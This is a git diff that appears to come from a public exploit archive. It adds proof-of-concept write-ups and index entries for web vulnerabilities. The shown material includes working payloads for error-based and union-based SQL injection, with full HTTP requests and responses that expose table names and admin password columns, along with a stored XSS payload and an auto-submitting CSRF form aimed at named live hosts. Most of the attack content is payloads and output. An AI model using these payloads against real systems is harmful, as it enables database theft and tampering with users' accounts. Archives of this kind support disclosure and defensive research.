+	# Affected Link: demo.com/login-script-demo/users.php
+	
+	# Parameter "my_item_search" is exploitable using xpath injection
+	
+	# Payload 1: 
+	my_item_search=1337'and extractvalue(5566,concat(0x7e,(select  table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- -
+	# Payload 2:
+	my_item_search=1337'and extractvalue(5566,concat(0x7e,(select  column_name from information_schema.columns where table_name="access_level" LIMIT 0,1),0x7e ))-- -
+	
+# POC 1 (Result: Table_name)
+/////////REQUEST//////////
+
+		POST /login-script-demo/users.php HTTP/1.1
+		Host: sitemakin.com
+		User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
+		Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+		Accept-Language: en-US,en;q=0.5
+		Accept-Encoding: gzip, deflate
+		Referer: https://demo.com/login-script-demo/users.php
+		Content-Type: application/x-www-form-urlencoded
+		Content-Length: 171
+		Cookie: PHPSESSID=57a62feb015f8912f7eaa856166343db; _ga=GA1.2.496857143.1527491400; _gid=GA1.2.909440178.1527491400; _gat=1
+		Connection: close
+		Upgrade-Insecure-Requests: 1
+
+		my_item_search=1337'and extractvalue(5566,concat(0x7e,(select  table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- -&submit=Search
+
+/////////RESPONSE//////////
+
+		<form method="post" action="/login-script-demo/users.php">
+		<select class="new-url2 form-control" name="my_item">
+		<br />
+		<b>Warning</b>:  PDOStatement::execute(): SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~access_level~' in <b>/home/sitemakin/public_html/login-script-demo/includes/post_users.inc.php</b> on line <b>33</b><br />
+		<br />
+		<b>Warning</b>:  main(): SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~access_level~' in <b>/home/sitemakin/public_html/login-script-demo/includes/post_users.inc.php</b> on line <b>34</b><br />
+				 <option value="all">All</option>
+
+
+
+# POC 2 (Result: Column_name)
+/////////REQUEST//////////
+
+		POST /login-script-demo/users.php HTTP/1.1
+		Host: sitemakin.com
+		User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
+		Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+		Accept-Language: en-US,en;q=0.5
+		Accept-Encoding: gzip, deflate
+		Referer: https://demo.com/login-script-demo/users.php
+		Content-Type: application/x-www-form-urlencoded
+		Content-Length: 175
+		Cookie: PHPSESSID=57a62feb015f8912f7eaa856166343db; _ga=GA1.2.496857143.1527491400; _gid=GA1.2.909440178.1527491400; _gat=1
+		Connection: close
+		Upgrade-Insecure-Requests: 1
+
+		my_item_search=1337'and extractvalue(5566,concat(0x7e,(select  column_name from information_schema.columns where table_name="access_level" LIMIT 0,1),0x7e ))-- -&submit=Search
+
+/////////RESPONSE//////////
+
+		<form method="post" action="/login-script-demo/users.php">
+		<select class="new-url2 form-control" name="my_item">
+		<br />
+		<b>Warning</b>:  PDOStatement::execute(): SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~id~' in <b>/home/sitemakin/public_html/login-script-demo/includes/post_users.inc.php</b> on line <b>33</b><br />
+		<br />
+		<b>Warning</b>:  main(): SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~id~' in <b>/home/sitemakin/public_html/login-script-demo/includes/post_users.inc.php</b> on line <b>34</b><br />
+				 <option value="all">All</option>
+				 
+################################################################################
\ No newline at end of file
diff --git a/exploits/php/webapps/44795.txt b/exploits/php/webapps/44795.txt
new file mode 100644
index 000000000..97ca5086d
--- /dev/null
+++ b/exploits/php/webapps/44795.txt
@@ -0,0 +1,25 @@
+# Exploit Title: MyBB ChangUonDyU Advanced Statistics Plugin v1.0.2 - Cross-Site Scripting
+# Date: 5/25/2018
+# Author: 0xB9
+# Twitter: @0xB9Sec
+# Contact: 0xB9[at]pm.me
+# Software Link: https://community.mybb.com/mods.php?action=view&pid=1125
+# Version: 1.0.2
+# Tested on: Ubuntu 18.04
+# CVE: CVE-2018-11532
+
+
+1. Description:
+This plugin displays advanced statistics on the index page such as latest posts with auto refresh using AJAX.
+ 
+
+ 
+2. Proof of Concept:
+Create a new thread with the following payload as the title  <svg onload=alert('XSS')>
+
+The alert will appear on the index page
+
+
+
+3. Solution:
+Update to the latest release
\ No newline at end of file
diff --git a/exploits/php/webapps/44799.txt b/exploits/php/webapps/44799.txt
new file mode 100644
index 000000000..59cfae12e
--- /dev/null
+++ b/exploits/php/webapps/44799.txt
@@ -0,0 +1,46 @@
+# Exploit Title: Facebook Clone Script 1.0.5 - 'search' SQL Injection
+# Date: 2018-05-29
+# Exploit Author: L0RD
+# Vendor Homepage: https://www.phpscriptsmall.com/product/facebook-clone/
+# Version: 1.0.5
+# Tested on: Win 10
+
+# POC : SQLi :
+
+# Parameter : search
+# Type : Union based
+# Payload : 
+1' UNION SELECT NULL,group_concat(table_name,0x3a,column_name),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
+from information_schema.columns where table_schema=schema()#
+
+# Request
+
+POST /demo/fbclone/top-search.php HTTP/1.1
+Host: smsemailmarketing.in
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
+Gecko/20100101 Firefox/61.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://smsemailmarketing.in/demo/fbclone/setting.php
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Content-Length: 231
+Connection: keep-alive
+
+search=1' UNION SELECT NULL,group_concat(table_name,0x3C62723E,column_name),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
+from information_schema.columns where table_schema=schema()#
+
+# Response
+
+HTTP/1.1 200 OK
+Server: nginx/1.12.2
+Date: Tue, 29 May 2018 17:12:31 GMT
+Content-Type: text/html; charset=UTF-8
+Connection: keep-alive
+Content-Length: 5370
+
+<a href='friend-profile.php?id='><img  src="images/unknown.jpeg"
+height="40px"
+width="40px">About_you:a_id,about_you:u_id,about_you:u_nick,about_you:u_nickname,about_you:u_nick_show,about_you:nick_privacy,admin:id,admin:name,admin:username,admin:password,admin:ref_password,admin:sex,admin:email_id,admin:valid_id,admin:user_type,admin:user_level,admin:city_code,admin:state_code,admin:country_code,admin:userimages,admin:description
+</a></div>
\ No newline at end of file
diff --git a/exploits/php/webapps/44800.txt b/exploits/php/webapps/44800.txt
new file mode 100644
index 000000000..de22b2703
--- /dev/null
+++ b/exploits/php/webapps/44800.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Facebook Clone Script 1.0.5 - Cross-Site Request Forgery
+# Date: 2018-05-29
+# Exploit Author: L0RD
+# Vendor Homepage: https://www.phpscriptsmall.com/product/facebook-clone/
+# Version: 1.0.5
+# Tested on: Win 10
+
+# Description :
+# Facebook Clone Script 1.0.5 has csrf vulnerability which attacker can
+# easily change user information .
+
+# POC :
+
+<html>
+  <head>
+     <title>Change information</title>
+  </head>
+  <body>
+    <form action="http://smsemailmarketing.in/demo/fbclone/setting.php" method="POST">
+      <input type="hidden" name="fn" value="anything" />
+      <input type="hidden" name="ln" value="anything" />
+      <input type="hidden" name="chnname" value="anything" />
+    </form>
+    <script>
+        document.forms[0].submit();
+    </script>
+  </body>
+</html>
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 2b3689d22..d5f29d507 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -9746,6 +9746,8 @@ id,file,description,date,author,type,platform,port
 44750,exploits/linux/local/44750.txt,"GNU glibc < 2.27 - Local Buffer Overflow",2018-05-24,JameelNabbo,local,linux,
 44776,exploits/android/local/44776.txt,"Werewolf Online 0.8.8 - Information Disclosure",2018-05-27,ManhNho,local,android,
 44787,exploits/windows_x86/local/44787.py,"ALFTP 5.31 - Local Buffer Overflow (SEH Bypass)",2018-05-28,"Gokul Babu",local,windows_x86,
+44797,exploits/linux/local/44797.txt,"GNU Barcode 0.99 - Buffer Overflow",2018-05-29,LiquidWorm,local,linux,
+44798,exploits/linux/local/44798.txt,"GNU Barcode 0.99 - Memory Leak",2018-05-29,LiquidWorm,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39461,3 +39463,10 @@ id,file,description,date,author,type,platform,port
 44788,exploits/php/webapps/44788.html,"Joomla! Component jCart for OpenCart 2.3.0.2 - Cross-Site Request Forgery",2018-05-28,L0RD,webapps,php,
 44789,exploits/php/webapps/44789.html,"Joomla! Component JoomOCShop 1.0 - Cross-Site Request Forgery",2018-05-28,L0RD,webapps,php,
 44790,exploits/php/webapps/44790.txt,"wityCMS 0.6.1 - Cross-Site Scripting",2018-05-28,"Nathu Nandwani",webapps,php,
+44792,exploits/asp/webapps/44792.txt,"IssueTrak 7.0 - SQL Injection",2018-05-29,"Chris Anastasio",webapps,asp,
+44793,exploits/php/webapps/44793.txt,"Sitemakin SLAC 1.0 -  'my_item_search' SQL Injection",2018-05-29,"Divya Jain",webapps,php,
+44794,exploits/hardware/webapps/44794.txt,"NUUO NVRmini2 / NVRsolo - Arbitrary File Upload",2018-05-29,M3@Pandas,webapps,hardware,
+44795,exploits/php/webapps/44795.txt,"MyBB ChangUonDyU Plugin 1.0.2 - Cross-Site Scripting",2018-05-29,0xB9,webapps,php,
+44796,exploits/java/webapps/44796.txt,"Pivotal Spring Java Framework < 5.0 - Remote Code Execution",2018-05-29,JameelNabbo,webapps,java,
+44799,exploits/php/webapps/44799.txt,"Facebook Clone Script 1.0.5 - 'search' SQL Injection",2018-05-29,L0RD,webapps,php,
+44800,exploits/php/webapps/44800.txt,"Facebook Clone Script 1.0.5 - Cross-Site Request Forgery",2018-05-29,L0RD,webapps,php,